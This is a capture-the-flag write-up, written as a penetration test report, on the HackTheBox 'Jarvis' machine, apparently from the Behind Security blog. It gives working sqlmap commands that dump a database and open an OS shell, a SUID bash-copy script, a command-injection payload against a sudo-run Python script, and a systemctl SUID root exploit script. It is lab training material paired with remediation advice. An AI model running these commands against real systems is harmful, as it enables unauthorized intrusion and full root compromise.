Jarvis CTF Writeup

Jarvis CTF icon

Jarvis CTF

Jarvis is a medium-level Linux challenge featuring a web server with SQL injection vulnerability. Exploiting this leads to initial access. Privilege escalation involves executing a script as another user and exploiting an SUID bit set on systemctl to gain root access.

HackTheBox Logo

HackTheBox

Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.

Executive Summary

This report documents the findings of a penetration test conducted against the Jarvis CTF's web server, identified by the virtual host supersecurehotel.htb and IP address 10.10.10.143. The test revealed multiple vulnerabilities, ranging from SQL Injection to Vertical Privilege Escalation, which pose significant security risks to the system. Immediate actions are recommended to mitigate these vulnerabilities and enhance the security posture of the system.

Introduction

The penetration test aimed to identify and exploit vulnerabilities within the system to assess its security. The primary focus was on the web server running at 10.10.10.143, which hosts the supersecurehotel.htb site. This report provides an overview of the methodologies used, a detailed description of the vulnerabilities discovered, and recommended mitigations.

Methodology

The penetration test followed a structured approach, beginning with service enumeration to identify open ports and services. The identified services were then subjected to various attack techniques to uncover vulnerabilities. The process involved automated tools as well as manual testing to ensure comprehensive coverage.

Findings and Recommendations

Overview of Vulnerabilities

The test uncovered four critical vulnerabilities, detailed below. Each finding is accompanied by a severity rating to indicate the potential impact on the system.

BS01: SQL Injection

- Severity: Elevated
- Impact: Allows unauthorized access to potentially sensitive information from the database.
- Recommendation: Implement input validation and prepared statements to mitigate this vulnerability. It's crucial to apply a whitelist approach for input validation and to ensure that queries are safely executed.

BS02: Remote Code Execution

- Severity: High
- Impact: Permits remote attackers to execute arbitrary code on the system.
- Recommendation: Addressing the SQL Injection vulnerability (BS01) will also mitigate this issue. Additionally, ensure that the web application runs with the least privileges required, reducing the potential impact of such vulnerabilities.

BS03: Horizontal Privilege Escalation

- Severity: High
- Impact: Allows attackers to escalate privileges horizontally, gaining access as other users.
- Recommendation: Review and restrict the use of sudo privileges for scripts and ensure that scripts executed with elevated privileges do not contain vulnerabilities that could be exploited for command injection.

BS04: Vertical Privilege Escalation

- Severity: Extreme
- Impact: Enables attackers to escalate privileges from a lower-privileged user to root.
- Recommendation: Remove unnecessary SUID bits from binaries that do not require them, especially those that can execute shell commands. Regularly audit permissions and SUID bits to ensure they are only assigned where absolutely necessary.

Additional Insights

The cybersecurity landscape is continuously evolving, with new threats emerging regularly. The vulnerabilities identified in this report—SQL Injection, Remote Code Execution, Horizontal, and Vertical Privilege Escalation—are not new but remain highly effective in the attacker's arsenal due to common oversights in security practices. Recent trends show an increase in sophisticated, targeted attacks exploiting such vulnerabilities, often as entry points for more extensive breach campaigns. Organizations should stay informed about the latest threat intelligence and adapt their security strategies accordingly.

Security Best Practices

To enhance the security posture and mitigate the risk of exploitation, organizations should adopt a layered security approach. This includes not only technical measures but also administrative and physical security controls. Some key best practices include, but are not limited to: least privilege principle, regular security audits and assessments, security awareness training, incident response planning and so on.

Initial Target - 10.10.10.143

Virtual Host: supersecurehotel.htb

Service Enumeration

Objective: Identify open ports and services to determine potential attack vectors.

Findings:

IP AddressPorts Open
10.10.10.143TCP: 22 (SSH), 80 (HTTP), 64999 (Custom Service)

Analysis: The presence of SSH and HTTP indicates standard remote management and web server functionalities, respectively. The custom service running on port 64999 could represent a less conventional entry point, warranting further investigation. Initial scans suggest a potential focus on the web server for vulnerability exploitation due to its accessibility and the broad attack surface such services often present.

Target: Web Server (port 80/tcp)

Jarvis CTF webserver homepage
Fig. 01: Jarvis CTF Web Server Home Page

BS01: SQL Injection

  • Vulnerability Explanation: A critical SQL injection flaw was discovered on supersecurehotel.htb/room.php, affecting the cod parameter. This flaw allows unauthorized database access, enabling attackers to retrieve or manipulate sensitive data. SQL Injection vulnerabilities arise from improper input validation and allow attackers to inject malicious SQL code into queries.
  • Severity: Elevated
    Recommendation: Implement stringent input validation measures, adopting a whitelist approach to only allow predefined inputs. Employing parameterized queries or prepared statements is crucial to ensure that user input is handled securely, effectively mitigating this vulnerability.
  • Steps to Reproduce:
    1. Utilize sqlmap, a tool designed for automating the detection and exploitation of SQL injection flaws.
    2. Execute the command: sqlmap -u http://supersecurehotel.htb/room.php?cod=2 -p cod -D hotel -T room --delay=3 --dump
  • Technical Insight: Although the hotel database currently lacks sensitive information, the vulnerability's existence poses a significant future risk. Its simplicity and the lack of requirement for advanced technical knowledge for exploitation elevate its severity.
Illustrating the vulnerable endpoint at Jarvis CTF web server
Fig. 02: Screenshot illustrating a vulnerable endpoint in Jarvis CTF's web server
Screenshot showing sqlmap output, extracting values from Jarvis CTF hotel database
Fig. 03: Screenshot illustrating the output for the sqlmap command performed against Jarvis CTF web server, showing detailed information about the injection point and techniques.
Screenshot illustrating output for the sqlmap command, detailing all the contents extracted from Jarvis CTF database
Fig. 04: Screenshot illustrating another output for the sqlmap command, this time dumping the "hotel" database from Jarvis CTF

BS02: Remote Code Execution (RCE)

  • Vulnerability Explanation: Exploitation of the previously mentioned SQL injection vulnerability opens the door to executing arbitrary code on the server as the www-data user. This level of access can enable an attacker to gain control over the web server, presenting a severe security risk.
  • Severity: High
    Recommendation: Rectifying the SQL injection vulnerability will inherently close the gap allowing for RCE. It is also advised to limit the web server's execution privileges and regularly audit for unnecessary services or applications that could increase the attack surface.
  • Steps to Reproduce:
    1. Following the injection point discovery, we'll use sqlmap to gain a shell on the server.
    2. Execute the following command: sqlmap -u http://supersecurehotel.htb/room.php?cod=2 -p cod --delay=2 --dbms=mysql --os-shell --web-root=/var/www/html --random-agent --skip-waf --batch --technique=B
Screenshot illustrating a foothold in Jarvis CTF linux system
Fig. 05: Screenshot illustrating a successful foothold in Jarvis CTF's linux system

Post-Exploitation

BS03: Horizontal Privilege Escalation

  • Vulnerability Explanation: The www-data user can exploit sudo permissions to execute a python script (`simpler.py`) as the user pepper, allowing command injection and lateral movement across the system.
  • Severity: High
    Recommendation: Audit and restrict sudo permissions, especially for scripts and binaries. Ensure that all scripts executed with elevated privileges are thoroughly vetted for vulnerabilities such as command injection.
  • Steps to Reproduce:
    1. Create and execute a malicious script (located at /var/www/html/evil.sh) to leverage the www-data user's permissions:
    #!/bin/bash
    
    cp /bin/bash /var/www/html/
    chmod +s /var/www/html/bash
    
    1. Run sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
    2. Utilize command injection via the vulnerable script to execute commands as the pepper user, by typing $(bash /var/www/html/evil.sh) and pressing enter.
    3. Execute /var/www/html/bash -p to gain a shell as pepper.
Screenshot illustrating user www-data executing the command sudo -l
Fig. 06: Screenshot illustrating user www-data executing the command sudo -l

BS04: Vertical Privilege Escalation

  • Vulnerability Explanation: The presence of a SUID bit on the /bin/systemctl binary allows a user with sufficient permissions, such as pepper, to escalate privileges to root.
  • Severity: Extreme
    Recommendation: Conduct a thorough audit of all binaries with the SUID bit set and ensure they are necessary for their intended purpose. Remove the SUID bit from binaries that do not require it to prevent unauthorized privilege escalation.
  • Steps to Reproduce:
  1. The script below illustrates how an attacker can exploit the SUID bit on systemctl to gain root access, emphasizing the critical nature of maintaining strict permissions on sensitive binaries.

File: exploit.sh

#!/bin/bash

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
/bin/bash -p
Screenshot illustrating a misconfigured SUID bit set for systemctl binary
Fig. 07: Screenshot illustrating a misconfigured SUID bit set for systemctl binary

Conclusion

We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon! 

Behind Security main logo, cropped.

BEHIND SECURITY

Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.

Scroll to Top